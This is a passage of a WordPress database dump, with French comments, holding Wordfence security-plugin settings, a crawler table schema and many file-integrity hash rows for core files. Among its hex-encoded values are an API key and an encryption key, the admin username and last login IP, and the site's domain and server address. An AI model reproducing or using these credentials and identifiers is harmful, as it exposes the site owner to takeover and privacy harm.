('securityLevel', 0x32),
('alertEmails', ''),
('liveTraf_ignoreUsers', ''),
('liveTraf_ignoreIPs', ''),
('liveTraf_ignoreUA', ''),
('apiKey', 0x35653835383332353537306463373164353737663630323633336665353961313861333361633935613838633536373361353637376464663132346464326161306638353931386638333461353733303739363033346362613735363862366263353563313433663938373263636532336137333663633462646362646131323936326531663332343863646466363231623161316539353237616363386665),
('maxMem', 0x323536),
('scan_exclude', ''),
('whitelisted', ''),
('bannedURLs', ''),
('maxExecutionTime', ''),
('howGetIPs', ''),
('actUpdateInterval', ''),
('alert_maxHourly', 0x30),
('loginSec_userBlacklist', ''),
('neverBlockBG', 0x6e65766572426c6f636b5665726966696564),
('loginSec_countFailMins', 0x323430),
('loginSec_lockoutMins', 0x323430),
('loginSec_strongPasswds', 0x70756273),
('loginSec_maxFailures', 0x3230),
('loginSec_maxForgotPasswd', 0x3230),
('maxGlobalRequests', 0x44495341424c4544),
('maxGlobalRequests_action', 0x7468726f74746c65),
('maxRequestsCrawlers', 0x44495341424c4544),
('maxRequestsCrawlers_action', 0x7468726f74746c65),
('maxRequestsHumans', 0x44495341424c4544),
('maxRequestsHumans_action', 0x7468726f74746c65),
('max404Crawlers', 0x44495341424c4544),
('max404Crawlers_action', 0x7468726f74746c65),
('max404Humans', 0x44495341424c4544),
('max404Humans_action', 0x7468726f74746c65),
('maxScanHits', 0x44495341424c4544),
('maxScanHits_action', 0x7468726f74746c65),
('blockedTime', 0x333030),
('email_summary_interval', 0x62697765656b6c79),
('email_summary_excluded_directories', 0x77702d636f6e74656e742f63616368652c77702d636f6e74656e742f776663616368652c77702d636f6e74656e742f706c7567696e732f776f726466656e63652f746d70),
('encKey', 0x32353266636533393739666437386366),
('vulnRegex', 0x2f283f3a776f726466656e63655f746573745f76756c6e5f6d617463687c5c2f74696d7468756d625c2e7068707c5c2f7468756d625c2e7068707c5c2f7468756d62735c2e7068707c5c2f7468756d626e61696c5c2e7068707c5c2f7468756d626e61696c735c2e7068707c5c2f7468756d6e61696c735c2e7068707c5c2f63726f707065725c2e7068707c5c2f70696373697a655c2e7068707c5c2f726573697a65725c2e7068707c636f6e6e6563746f72735c2f75706c6f6164746573745c2e68746d6c7c636f6e6e6563746f72735c2f746573745c2e68746d6c7c6d696e676c65666f72756d616374696f6e7c75706c6f61646966795c2e7068707c616c6c7765626d656e75732d776f726470726573732d6d656e752d706c7567696e7c77702d6379636c652d706c61796c6973747c636f756e742d7065722d6461797c77702d6175746f796f75747562657c7061792d776974682d74776565747c636f6d6d656e742d726174696e675c2f636b2d70726f636573736b61726d615c2e706870292f69),
('welcomeClosed', 0x31),
('wf_summaryItems', 0x613a31363a7b733a31303a22746f74616c5573657273223b693a333b733a31303a22746f74616c5061676573223b733a323a223130223b733a31303a22746f74616c506f737473223b733a313a2231223b733a31333a22746f74616c436f6d6d656e7473223b733a333a22313435223b733a31353a22746f74616c43617465676f72696573223b733a313a2231223b733a31313a22746f74616c5461626c6573223b693a35373b733a393a22746f74616c526f7773223b693a34343731313b733a31323a22746f74616c506c7567696e73223b693a31343b733a31303a226c617374557064617465223b693a313439323332303236323b733a31313a22746f74616c5468656d6573223b693a343b733a393a22746f74616c44617461223b733a383a2233372e3638204d42223b733a31303a22746f74616c46696c6573223b693a323431313b733a393a22746f74616c44697273223b693a3334393b733a31303a226c696e65734f66504850223b693a3339363339323b733a31303a226c696e65734f664a4348223b693a3131333738333b733a383a227363616e54696d65223b643a313439323332303236322e3039343730353130343832373838303835393337353b7d),
('tourClosed', 0x31),
('totalScansRun', 0x31333335),
('wfKillRequested', 0x30),
('currentCronKey', ''),
('wf_scanRunning', ''),
('wfStatusStartMsgs', 0x613a31333a7b693a303b733a303a22223b693a313b733a303a22223b693a323b733a303a22223b693a333b733a303a22223b693a343b733a303a22223b693a353b733a303a22223b693a363b733a303a22223b693a373b733a303a22223b693a383b733a303a22223b693a393b733a303a22223b693a31303b733a303a22223b693a31313b733a303a22223b693a31323b733a303a22223b7d),
('wf_dnsCNAME', 0x7777772e63726f7373747261696e696e6763656e7465722e626520706f696e747320746f2063726f7373747261696e696e6763656e7465722e6265),
('wf_dnsA', 0x63726f7373747261696e696e6763656e7465722e626520706f696e747320746f203231332e3138362e33332e33),
('wf_dnsMX', ''),
('wf_dnsLogged', 0x31),
('lastScanCompleted', 0x6f6b),
('wfPeakMemory', 0x3735373836343438),
('totalLoginHits', 0x313037303131),
('totalLogins', 0x3131),
('lastAdminLogin', 0x613a363a7b733a363a22757365724944223b693a313b733a383a22757365726e616d65223b733a353a2261646d696e223b733a393a2266697273744e616d65223b733a303a22223b733a383a226c6173744e616d65223b733a303a22223b733a343a2274696d65223b733a32363a2253756e2031367468204a756c7920402030373a35363a3131414d223b733a323a224950223b733a31343a2236322e3233352e3231352e323331223b7d),
('totalAlertsSent', 0x35363838),
('lastScheduledScanStart', 0x31343932333230323330),
('totalCommentsFiltered', 0x3430),
('total503s', 0x3431333339),
('totalIPsBlocked', 0x3330393737),
('totalIPsLocked', 0x35363833),
('wfsd_engine', ''),
('totalIPsThrottled', 0x31),
('totalSpamStopped', 0x31);

-- --------------------------------------------------------

--
-- Structure de la table `www2_wfCrawlers`
--

CREATE TABLE `www2_wfCrawlers` (
  `IP` int(10) UNSIGNED NOT NULL,
  `patternSig` binary(16) NOT NULL,
  `status` char(8) NOT NULL,
  `lastUpdate` int(10) UNSIGNED NOT NULL,
  `PTR` varchar(255) DEFAULT ''
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

-- --------------------------------------------------------

--
-- Structure de la table `www2_wfFileMods`
--

CREATE TABLE `www2_wfFileMods` (
  `filenameMD5` binary(16) NOT NULL,
  `filename` varchar(1000) NOT NULL,
  `knownFile` tinyint(3) UNSIGNED NOT NULL,
  `oldMD5` binary(16) NOT NULL,
  `newMD5` binary(16) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www2_wfFileMods`
--

INSERT INTO `www2_wfFileMods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`) VALUES
(0x8052c42ab3b8aa06a3f5f788a4ddccc2, '.htaccess', 0, 0x8c1339b1053ad881452f3b9d6b66916e, 0x8c1339b1053ad881452f3b9d6b66916e),
(0x828e0013b8f3bc1bb22b4f57172b019d, 'index.php', 1, 0x00000000000000000000000000000000, 0xb61b25303be0f573a6b9446d5cbe3a5b),
(0x98cd14c95bb22f9d397da0603a77d950, 'license.txt', 1, 0x00000000000000000000000000000000, 0x732b8b10f9f4e8af61ab94c713580149),
(0x92a36320069a227bd1685020739dab61, 'map.png', 0, 0x5871fb8eb996f24690a2c5f2c388b291, 0x5871fb8eb996f24690a2c5f2c388b291),
(0xb9a2b8cad8e565582e3a4c1d77f1efb7, 'ok.png', 0, 0x7f350ea7098e05a18bf2bfa268975c39, 0x7f350ea7098e05a18bf2bfa268975c39),
(0x61a73fa3aa5fd7cba2bed0366aa8ec58, 'readme.html', 1, 0x00000000000000000000000000000000, 0x77de437f7578bc09cec06e7938606ecd),
(0xc70b67cc511a9d2895f4ccddae5dec61, 'reservation1.html', 0, 0xcbdaea6e8867b1a154aedbeeb22c0357, 0xcbdaea6e8867b1a154aedbeeb22c0357),
(0x6683d2f51dbcbd25028f8aeed877acf5, 'style_client.css', 0, 0x4c5761d67a95291d57767d26475716f3, 0x4c5761d67a95291d57767d26475716f3),
(0xe7c3d54bff679bd0e5876f1b23e71330, 'wp-activate.php', 1, 0x00000000000000000000000000000000, 0xb94e5f17ca85eea62dd8ff75a2c15058),
(0x2d87ba2937a63579b03863dae25776d8, 'wp-admin/about.php', 1, 0x00000000000000000000000000000000, 0x8fa00b6b26f7b273beaf9f1b16264bd9),
(0x0e58ffe648e5a5a528bb3ac85aeda914, 'wp-admin/admin-ajax.php', 1, 0x00000000000000000000000000000000, 0x62ccd06473f414a9d9ec4ac575d26afd),
(0x213162dd8539a0aa2ae3c0ff5c11e1c6, 'wp-admin/admin-footer.php', 1, 0x00000000000000000000000000000000, 0x283fbda7e385fe39698373bc1f66f028),
(0x1510c84b55f567304d55bf2f9af6ca87, 'wp-admin/admin-functions.php', 1, 0x00000000000000000000000000000000, 0x9bdf60c84e3543672bc0e28e2c50bebf),
(0x40e86dbeb7ebc54f0c1208c5dd571201, 'wp-admin/admin-header.php', 1, 0x00000000000000000000000000000000, 0x0e31022b47e58c0d2bac84dad755bc5c),
(0xed5d9a1da740830a97ab3ec4baee596e, 'wp-admin/admin-post.php', 1, 0x00000000000000000000000000000000, 0xbf1e28687e173632da8193bb120a2dd6),
(0x0b941d7f88a62c482862e6105f46944f, 'wp-admin/admin.php', 1, 0x00000000000000000000000000000000, 0x4827423650b376ae143c0af93898dde7),
(0x0958ce740c5c34764e493582d86acbc2, 'wp-admin/async-upload.php', 1, 0x00000000000000000000000000000000, 0x4f712b2bbe2ea0dddce91ab287a697a6),
(0x22d3c4360d0c2b4b137bd7181a216105, 'wp-admin/comment.php', 1, 0x00000000000000000000000000000000, 0xb49faed8f0c5dd253185cca31ad69701),
(0x6b4dcffc969ca69a020ceecc99597370, 'wp-admin/credits.php', 1, 0x00000000000000000000000000000000, 0x81cf111556acf02d6bd097c110b44f9c),
(0xefc010fb50868961600e5875eea5a106, 'wp-admin/css/color-picker-rtl.css', 1, 0x00000000000000000000000000000000, 0x96caf0347b9d3d8caf8fe65fff4d7ca2),
(0x11d272881f57eaae33a899e3e1a5be56, 'wp-admin/css/color-picker-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x35a559a8d3f4dddca3af16ae66c3cf9a),
(0x46f3c2ef3fe689433b248ce948190d0d, 'wp-admin/css/color-picker.css', 1, 0x00000000000000000000000000000000, 0xb90e7baca3cbec8c1d5a11da060bcdfd),
(0x150f98afdca139ee755f5c0ac339c127, 'wp-admin/css/color-picker.min.css', 1, 0x00000000000000000000000000000000, 0x9d746a565ddc0e7ad9f9521644289b90),
(0xdd1c3e8f765e2feeec770a8868d4db00, 'wp-admin/css/colors-classic.css', 1, 0x00000000000000000000000000000000, 0xee29aa2dc15802e0907872be559c742f),
(0xe3f22293d05f69a1417afb3eb4358737, 'wp-admin/css/colors-classic.min.css', 1, 0x00000000000000000000000000000000, 0xee2d3f9b681056eb0c8c1a1703c110b2),
(0x18f9426f0fadb9f775302a1d70611b17, 'wp-admin/css/colors-fresh.css', 1, 0x00000000000000000000000000000000, 0xc4b004c430b5ef1d2bacd01b098e4a60),
(0x38015694287133ebaaca76033e6df595, 'wp-admin/css/colors-fresh.min.css', 1, 0x00000000000000000000000000000000, 0xe67f2d5d990caf64736f32b9ca54a950),
(0xf3ff56ac936b39dbb4ee73bfbb80d6bf, 'wp-admin/css/customize-controls-rtl.css', 1, 0x00000000000000000000000000000000, 0xd7feb34b845f1fa5530a4c51d27bdab1),
(0xcd0fa9ffe1877011f76ad69b6092c877, 'wp-admin/css/customize-controls-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x6a01df682595d7c10ce1380a2faeab21),
(0x8c3f9a0a35fcb448e33fe2e0c1c0e0e8, 'wp-admin/css/customize-controls.css', 1, 0x00000000000000000000000000000000, 0xdfa6a9415541755284ed912ba66a47ba),
(0xfa2ed5b6bbd5f15a67027bda3df19acc, 'wp-admin/css/customize-controls.min.css', 1, 0x00000000000000000000000000000000, 0xad658adc879ba1db73141c9fa0b5c67d),
(0xabc2abace4972d6a3db475b64e5c7127, 'wp-admin/css/farbtastic.css', 1, 0x00000000000000000000000000000000, 0x90e8ee437da5a2fa7bd428a67182a198),
(0xb58df8a70584a1c96b4dd4d53fca7558, 'wp-admin/css/ie-rtl.css', 1, 0x00000000000000000000000000000000, 0x879bad5fb1d6485b6d9b773c53771c36),
(0x1c7603739d25c27aa1efb4faf8be46d3, 'wp-admin/css/ie-rtl.min.css', 1, 0x00000000000000000000000000000000, 0xa3c0334eac78e5a18d33185363c6bc50),
(0x0445f82617afd1564e05aeb30891224e, 'wp-admin/css/ie.css', 1, 0x00000000000000000000000000000000, 0x17aae68019209c421bfa960a427905e2),
(0x06d1a79b045f8334156121a246a401f1, 'wp-admin/css/ie.min.css', 1, 0x00000000000000000000000000000000, 0xc48f03938beb59b2bc71921974abd386),
(0x3c8f8939fe75fe6ab3aeff8421c1240f, 'wp-admin/css/install.css', 1, 0x00000000000000000000000000000000, 0xb5a5602923179daa9c75b75e47fd1174),
(0x83e2e8ca86d7e9906ea544e3ae96cb28, 'wp-admin/css/install.min.css', 1, 0x00000000000000000000000000000000, 0x873132014ec1c1918ee9fbc06e0de909),
(0x72f90fce0a97db62b0952315f0a9e97f, 'wp-admin/css/media-rtl.css', 1, 0x00000000000000000000000000000000, 0xed5e5527b5bd5a5bca516e801dc1dc0b),
(0xc17addbfe4af2658e29d9936a498cc73, 'wp-admin/css/media-rtl.min.css', 1, 0x00000000000000000000000000000000, 0xa3f07d2e699aff8d66db9352172f3c41),
(0x988da3fd549db94489c046d24b3106c7, 'wp-admin/css/media.css', 1, 0x00000000000000000000000000000000, 0x163d75e9faf70bf4e002638b746af26d),
(0x25d01550622eceffba38ba4764ce74cd, 'wp-admin/css/media.min.css', 1, 0x00000000000000000000000000000000, 0xc997f050f7bb25caf1818ea0f28ed4a4),
(0x8eb0d6975d4e528dbcef537b71763f85, 'wp-admin/css/wp-admin-rtl.css', 1, 0x00000000000000000000000000000000, 0x95137319acf4e217d0b193768155c9fa),
(0xb586bb2428ad678b28c1aed450dae72f, 'wp-admin/css/wp-admin-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x990c061c85fc81736b9c6befac3b5c77),
(0x64e8348f6ae0320b55c2568eb724f650, 'wp-admin/css/wp-admin.css', 1, 0x00000000000000000000000000000000, 0xf0894fa9c9733d0e577fc5beddc726cd),
(0xd7c76a3096a9de77fe06457dc2ae529f, 'wp-admin/css/wp-admin.min.css', 1, 0x00000000000000000000000000000000, 0xddc1a40f07fa0698af312e2793e4cb41),
(0xb98c3f83307cc3f6e03575c6a18301be, 'wp-admin/custom-background.php', 1, 0x00000000000000000000000000000000, 0xd8a2b5b1eb6c74b18c1fd9c4f71871f6),
(0x75e171671a008738896803d4adfb00f0, 'wp-admin/custom-header.php', 1, 0x00000000000000000000000000000000, 0xc24efd8bdfc0ade18afc2961732602c4),
(0xaa3b133f32e8e18853fde3a700fb9a70, 'wp-admin/customize.php', 1, 0x00000000000000000000000000000000, 0xd5f8ec98103813f0a24f3b270d472907),
(0x9eee703f455ea240b7278ce3501245c5, 'wp-admin/edit-comments.php', 1, 0x00000000000000000000000000000000, 0x96f7ca9afc0f3b4c646204bdd8df1267),
(0xe60df2625cf19989c4c98db21ac412eb, 'wp-admin/edit-form-advanced.php', 1, 0x00000000000000000000000000000000, 0xc1ac581c9da2856a0f10888e459dabed),
(0x479637181a089ee6b249263aed190778, 'wp-admin/edit-form-comment.php', 1, 0x00000000000000000000000000000000, 0x187b18d2fabae997290234653719c014),
(0x0a93b591622dd356f83a88837c6db5ff, 'wp-admin/edit-link-form.php', 1, 0x00000000000000000000000000000000, 0xf28a4ef058b09d340ff761fd004dfd52),
(0x25ba0cd2e0eb380e5e1b9c563cd174cb, 'wp-admin/edit-tag-form.php', 1, 0x00000000000000000000000000000000, 0xc9d740cbe2b32377e259b67703aa4b91),
(0xbe8a68a2dddf29554740c87896cc7609, 'wp-admin/edit-tags.php', 1, 0x00000000000000000000000000000000, 0x64b7bb6ef758064e03a2e4a693466338),
(0x59854c61d80e1f181180b56818d02801, 'wp-admin/edit.php', 1, 0x00000000000000000000000000000000, 0x9e6709e38ec99e8ac1e4823c54dcadef),
(0xc2c0318c92c17cb80f7d9a94e264511d, 'wp-admin/export.php', 1, 0x00000000000000000000000000000000, 0x6ea11edc4d03d41fcd6d1c2b4ad813b9),
(0x4fa783b5e026c27281e8938f951eea20, 'wp-admin/freedoms.php', 1, 0x00000000000000000000000000000000, 0x877280a03359bccd8ee7cadbe9baac5e),
(0x73d9e48f72674b3f6946c347634925d0, 'wp-admin/images/about-globe-2x.png', 1, 0x00000000000000000000000000000000, 0x3003678c6ccc6f4c874f01e58dee454b),
(0x41e6e5c14bcb8d460b22735a7c2b93b5, 'wp-admin/images/about-search-2x.png', 1, 0x00000000000000000000000000000000, 0xae40cbce246b6f3ea4d95b05939a92d6),
(0x3e2f0e19bfa2bcfc151ed794bbe6ef58, 'wp-admin/images/about-updates-2x.png', 1, 0x00000000000000000000000000000000, 0xc041e28a6ea33aa206cf9b43c3b1f428),
(0xe6ce57fbeac322fadaea01536b073acd, 'wp-admin/images/align-center-2x.png', 1, 0x00000000000000000000000000000000, 0x9ebeb22df3728735042a4a37a1496611),
(0x262a83cac464c486d6b88f0905d64835, 'wp-admin/images/align-center.png', 1, 0x00000000000000000000000000000000, 0x09d91addb6b53479e68c645931d9658e),
(0xf65639b4d44bb1e1c4676f58b1b937d3, 'wp-admin/images/align-left-2x.png', 1, 0x00000000000000000000000000000000, 0x698538b14fb9839aecd01d5e97c66316),
(0xe9aaca6dac164d1e74a88604db57b342, 'wp-admin/images/align-left.png', 1, 0x00000000000000000000000000000000, 0x5cfd7930cffa6412f75af26f2e689ed4),
(0xd45d7f2ef56f6ff0c8a6074d2d6e0987, 'wp-admin/images/align-none-2x.png', 1, 0x00000000000000000000000000000000, 0xf858439905295bd705b09b2dba3418bd),
(0x4d57800912e510a6be1f3ac9e498d98a, 'wp-admin/images/align-none.png', 1, 0x00000000000000000000000000000000, 0xf1ad65716432a0a1da7591a5c2f10d04),
(0x76e247822ec267b741f5c62306f572e9, 'wp-admin/images/align-right-2x.png', 1, 0x00000000000000000000000000000000, 0x6883026cbd3e72ba5da36c57c60fc078),
(0xc3cd746e529fd894c0e1afcec6255e81, 'wp-admin/images/align-right.png', 1, 0x00000000000000000000000000000000, 0x42d8f3e2874f6523d36c403a502b2276),
(0x995b82179fae514822705331c8aaeb63, 'wp-admin/images/arrows-2x.png', 1, 0x00000000000000000000000000000000, 0x972051f086017dcef17964622336840b),
(0x38e05f5debfe3ec6efa62e6e90082974, 'wp-admin/images/arrows-dark-2x.png', 1, 0x00000000000000000000000000000000, 0xbc97d62061c943dd6ff71d964c7d8425),
(0xfe8f59b628c5355831c1a281d4ac8297, 'wp-admin/images/arrows-dark-vs-2x.png', 1, 0x00000000000000000000000000000000, 0xbf96d253f8dfcad84f9d649de07dd797),
(0xababf51d961938c7ce5d210250f8d4c3, 'wp-admin/images/arrows-dark-vs.png', 1, 0x00000000000000000000000000000000, 0xa7bd090aa6d1cd54ec9f2a9ccc1043db),
(0xcfb3400b5934caa95183a7ca0be0e489, 'wp-admin/images/arrows-dark.png', 1, 0x00000000000000000000000000000000, 0x8b77c74d3b2eec1f50bb59ae34bdb5ff),
(0xc3cbb2072330829911dff661e156b01f, 'wp-admin/images/arrows-pr-2x.png', 1, 0x00000000000000000000000000000000, 0xb008e43aab25a6a2cd4ef2f0a5c4bfba),
(0xa89aca43ff6825b6354478d89724456a, 'wp-admin/images/arrows-pr.png', 1, 0x00000000000000000000000000000000, 0xdf60fed3e762a0b86903b629f90ffd79),
(0x1ec6f9d598b4a76029d07a161d66bc30, 'wp-admin/images/arrows-vs-2x.png', 1, 0x00000000000000000000000000000000, 0x550a69654948fc739ae5f9a537106cb4),
(0x8efc6671c81b399a0434166c80d92da2, 'wp-admin/images/arrows-vs.png', 1, 0x00000000000000000000000000000000, 0x7d5abe2a367e42e87482743521166c1f),
(0xd345236cf0c24cfee65f26dcaab3c2ef, 'wp-admin/images/arrows.png', 1, 0x00000000000000000000000000000000, 0x7fda76920124f03e88d1dfd93e03bf59),
(0x47803971f3f1eb3dcaa55b333f1961e8, 'wp-admin/images/bubble_bg-2x.gif', 1, 0x00000000000000000000000000000000, 0x1a76a1434d972ee849b119e69cd3f2ba),
(0x0e0bdb7d08e75267ef179ad6435abcc2, 'wp-admin/images/bubble_bg-rtl-2x.gif', 1, 0x00000000000000000000000000000000, 0x507ddcae331a55002d8e006a8ea0504c),
(0x501c28d4e672832cdaab80b57025ef71, 'wp-admin/images/bubble_bg-rtl.gif', 1, 0x00000000000000000000000000000000, 0x0acb13b5fb21466f3984a5a3bdfc3869),
(0x51756f145058d8d80005ab15b853da9e, 'wp-admin/images/bubble_bg.gif', 1, 0x00000000000000000000000000000000, 0xb78fd5758e486128cf448c5973ca6ee4),
(0xd2d54c7435393396755e98ebe429d9d4, 'wp-admin/images/comment-grey-bubble-2x.png', 1, 0x00000000000000000000000000000000, 0xe1334238affb186ad35b2a79f8739e94),
(0x05a2d81bc01d65df6257fc4130cf1e64, 'wp-admin/images/comment-grey-bubble.png', 1, 0x00000000000000000000000000000000, 0x8f59128f2a27b489b0a974c0b6b21046),
(0x10cf4915a2d85c6ab6acd178cccdcb67, 'wp-admin/images/date-button-2x.gif', 1, 0x00000000000000000000000000000000, 0x5d78ee005f9f25fad855bef396a5e822),
(0xfdcd6184ed274054e791938903f5d6ca, 'wp-admin/images/date-button.gif', 1, 0x00000000000000000000000000000000, 0x946eeed3973aa98d1833849d9a4bf8da),
(0x8f6a254dbbc98df2d17017295a89c40b, 'wp-admin/images/generic.png', 1, 0x00000000000000000000000000000000, 0xf88e1b95ff278a5b231f39380b211ed0),
(0xc81a7b0867ddfc3f17d13367daa21abd, 'wp-admin/images/icons32-2x.png', 1, 0x00000000000000000000000000000000, 0x749a56fae96141ff576bb99c4037ebd9),
(0x9fce1b9626bfa24ec22cf5a5ef8c3650, 'wp-admin/images/icons32-vs-2x.png', 1, 0x00000000000000000000000000000000, 0x4487c15d43389e88b3694803e2beaeb7),
(0x87ab4c209d55ffd5c0b966afe075e23c, 'wp-admin/images/icons32-vs.png', 1, 0x00000000000000000000000000000000, 0xd5a8c1950e1a20172151f463c8d9d489),
(0xc231a88c575628329f9836b284b31594, 'wp-admin/images/icons32.png', 1, 0x00000000000000000000000000000000, 0xdb0235502fde48e086e206c574c8adae),
(0x124cd6c4fcfd38e0ef80f55ca8ddbc2b, 'wp-admin/images/imgedit-icons-2x.png', 1, 0x00000000000000000000000000000000, 0x22675b63c33b6e9b2a63e84018f44a0e),
(0x7bf5871f903fecd1d5fc0d92da0a1b27, 'wp-admin/images/imgedit-icons.png', 1, 0x00000000000000000000000000000000, 0x45cbcb9891d6bcbf796e50fb6a6112db),
(0xa23467818c651fcad8e93ea9f3d3df9d, 'wp-admin/images/list-2x.png', 1, 0x00000000000000000000000000000000, 0x68d5bb134953c23217fdd36982679a0c),
(0xade25a0a7504d56f4bb020afb6543b65, 'wp-admin/images/list.png', 1, 0x00000000000000000000000000000000, 0x1e123e96bd2a1ce2c0d3b305d153f1c3),
(0x1c29fa4de6c85ef0b6c3bb6f7af0a905, 'wp-admin/images/loading.gif', 1, 0x00000000000000000000000000000000, 0x9a8269421303631316be4ab5e34870e1),
(0x54da19bafdaceb47369305f9f33d5093, 'wp-admin/images/lock-2x.png', 1, 0x00000000000000000000000000000000, 0x6e0a92872a2545f5bf44bf7e3daa73c1),
(0x2fc3c1a67fa03e39dbfbe46cd6c2a16d, 'wp-admin/images/lock.png', 1, 0x00000000000000000000000000000000, 0x1acca50f0abf4ccd7a0f34669815158a),
(0xbb00b2d725335b247800e8e22eb08e28, 'wp-admin/images/marker.png', 1, 0x00000000000000000000000000000000, 0x3e9aa4c85a09fe868e23d2ffb260df46),
(0x40de3b358b5811f5f156a87f944fc65a, 'wp-admin/images/mask.png', 1, 0x00000000000000000000000000000000, 0xfcf693677ea822e6d24af7b2e4a98e99),
(0x40f773028d5af6945e99a5d3e8718d76, 'wp-admin/images/media-button-2x.png', 1, 0x00000000000000000000000000000000, 0x23db5749e51d85105cb8d03fc81305c9),
(0x31dc456651a4762329f30ad930456b51, 'wp-admin/images/media-button-image.gif', 1, 0x00000000000000000000000000000000, 0x538670efb6e78fcfdd4662623be4e675),
(0x615c632c49223554cd05b123cc8b1ffe, 'wp-admin/images/media-button-music.gif', 1, 0x00000000000000000000000000000000, 0x423f910219d605ddd355681816a08b45),
(0x014e519e222a687a1caa72c3777c1af8, 'wp-admin/images/media-button-other.gif', 1, 0x00000000000000000000000000000000, 0x94e0e87b48fc4c7830164d48cfb41e7f),
(0xfe1bfdfe819c03297a5d213fbbb161c0, 'wp-admin/images/media-button-video.gif', 1, 0x00000000000000000000000000000000, 0xba34507befaa9b9b06e96c6c846bab69),
(0x61299e544d57e1b84f6f88b851947cdc, 'wp-admin/images/media-button.png', 1, 0x00000000000000000000000000000000, 0xb2b6c3e336054070e8927a5e7965f3ce),
(0x0522929f4edfac6a6a29859f008c954e, 'wp-admin/images/menu-2x.png', 1, 0x00000000000000000000000000000000, 0x197eb3dfa27be4df10b35a57c0a7dde7),
(0xc5952d3e0f5854bea2fc60d3b26c310e, 'wp-admin/images/menu-shadow-rtl.png', 1, 0x00000000000000000000000000000000, 0x6238d00c97d2f2fb553405d2cbd800b5),
(0xa52cd17b80842c65629aeed652c6585f, 'wp-admin/images/menu-shadow.png', 1, 0x00000000000000000000000000000000, 0x91c68df0c5f4d4b84de19f51dbe4f3b7),
(0x2a2061d846b2cc19f0349fb075db7655, 'wp-admin/images/menu-vs-2x.png', 1, 0x00000000000000000000000000000000, 0xa1331c4faa15c8d6fcb800eeec4c5500),
(0x0215745d95d99f75c3d575dbfce56afb, 'wp-admin/images/menu-vs.png', 1, 0x00000000000000000000000000000000, 0x73affbee3e5e3aec19199a657b4f88f7),
(0x40ba58440ac30a524e867f9074ebcdd3, 'wp-admin/images/menu.png', 1, 0x00000000000000000000000000000000, 0x48b8c0d56811b724ea34d7f052a126b3),
(0xeb462019f338c72bb229d0d872dd50e8, 'wp-admin/images/no.png', 1, 0x00000000000000000000000000000000, 0xc86bbf1c64c924f99fdc9f5637f0c08b),
(0xb513e5b5152b449e46dcbf545a5b4837, 'wp-admin/images/post-formats-vs.png', 1, 0x00000000000000000000000000000000, 0x24726acea48e9bffc1744638f2d1f666),
(0xe300bc95d7956f786933250d2b5d6b67, 'wp-admin/images/post-formats.png', 1, 0x00000000000000000000000000000000, 0xcf8cdb0bc623dee2e18898b44b11744c),
(0x6e0e0e5dfb6a16373c331349537351df, 'wp-admin/images/post-formats32-vs.png', 1, 0x00000000000000000000000000000000, 0xb6c98d25500180cc6604d155f67651f7),
(0xcec593fefafacf94f2031f3d9fba2336, 'wp-admin/images/post-formats32.png', 1, 0x00000000000000000000000000000000, 0xfbbcf81a2b6ce7e9e419fb639a8a2a24),
(0x59f5da7edac7e5e109366e1fd232d015, 'wp-admin/images/press-this-2x.png', 1, 0x00000000000000000000000000000000, 0x8be606bebfbff936f7d6ac3927be1337),
(0xaa05d44cf33da30c9c6b3c2d261ec897, 'wp-admin/images/press-this.png', 1, 0x00000000000000000000000000000000, 0xbeef1f704b00931544c0ddb07933c498),
(0xf2b63f7b6f0b5fb1b0b527bb186ed611, 'wp-admin/images/resize-2x.gif', 1, 0x00000000000000000000000000000000, 0x83e904eb31b68fa48cfdbcaa64ef2966),
(0xac3321390b16e43de8369d0c12dda10f, 'wp-admin/images/resize-rtl-2x.gif', 1, 0x00000000000000000000000000000000, 0xfcd61114e538d359a80d419d6554f55e),
(0x8849dd7b8b3fbb8672f45daf1e1da037, 'wp-admin/images/resize-rtl.gif', 1, 0x00000000000000000000000000000000, 0xddaa579f547c7877730ae2a599a0a0df),
(0x7e3fa14abc49d6622a15d7baea65e843, 'wp-admin/images/resize.gif', 1, 0x00000000000000000000000000000000, 0x68a8e57741df1a16444713a11d7c5b82),
(0x0a669d868959a1b703023426fc4cf0a6, 'wp-admin/images/se.png', 1, 0x00000000000000000000000000000000, 0xd6c89442c360bd1e08da2e7d1527373a),
(0x58973a382b7fcb93323e565daccb38e0, 'wp-admin/images/sort-2x.gif', 1, 0x00000000000000000000000000000000, 0xe07d0440c2d59e252b64f10bd293f897),
(0xdd5b36bb02358084112bc809e16e39e4, 'wp-admin/images/sort.gif', 1, 0x00000000000000000000000000000000, 0x2bf510e2b04bacc1677a7a04dc318abf),
(0x50de3124b61b1b89f3025c170f2ae543, 'wp-admin/images/stars-2x.png', 1, 0x00000000000000000000000000000000, 0xf5ea4194a79c23e653b24d0c65032e5e),
(0x48b365b19a9484469245325975000b4d, 'wp-admin/images/stars-rtl-2x.png', 1, 0x00000000000000000000000000000000, 0x6ec2333cc32894b25402a1d21924a6c9),
(0xec9114c751cff5fa37c10bf9717de9d4, 'wp-admin/images/stars-rtl.png', 1, 0x00000000000000000000000000000000, 0xa3c107d957897a323b9801eb7a0479ad),
(0xe946ce6a2159e97b072e4a3d2cb5ae12, 'wp-admin/images/stars.png', 1, 0x00000000000000000000000000000000, 0x5bace01f99903e3cf56bb27bd2ec2891),
(0xff344dee0800d549472818e203124cfb, 'wp-admin/images/welcome-icons-2x.png', 1, 0x00000000000000000000000000000000, 0x520a173799e42122f793bed6c3c8fd64),
(0x42cbc522cccbf4f0509ccc2ac973c511, 'wp-admin/images/welcome-icons.png', 1, 0x00000000000000000000000000000000, 0xebbeff45f2fee9bef30233451be6c87f),
(0xc62b92a0cd67d405bec27136a55e00e8, 'wp-admin/images/wheel.png', 1, 0x00000000000000000000000000000000, 0x18568b368b3c5dfe7b67017a1ac3d329),
(0x3c7a369183c9fbfc4b0f700235f961a1, 'wp-admin/images/wordpress-logo-2x.png', 1, 0x00000000000000000000000000000000, 0x784aa9fed2f19f1607cae85205507163),
(0x05745a518fa5597a3085fabddfe8b7ab, 'wp-admin/images/wordpress-logo.png', 1, 0x00000000000000000000000000000000, 0xc6b0f979b9e66fc338f4cb3853a5608a),
(0x1f50d7b03a22b77d72a24239a335cce2, 'wp-admin/images/wp-badge-2x.png', 1, 0x00000000000000000000000000000000, 0x958efa9f64653d25a424ad21cd16dac1),
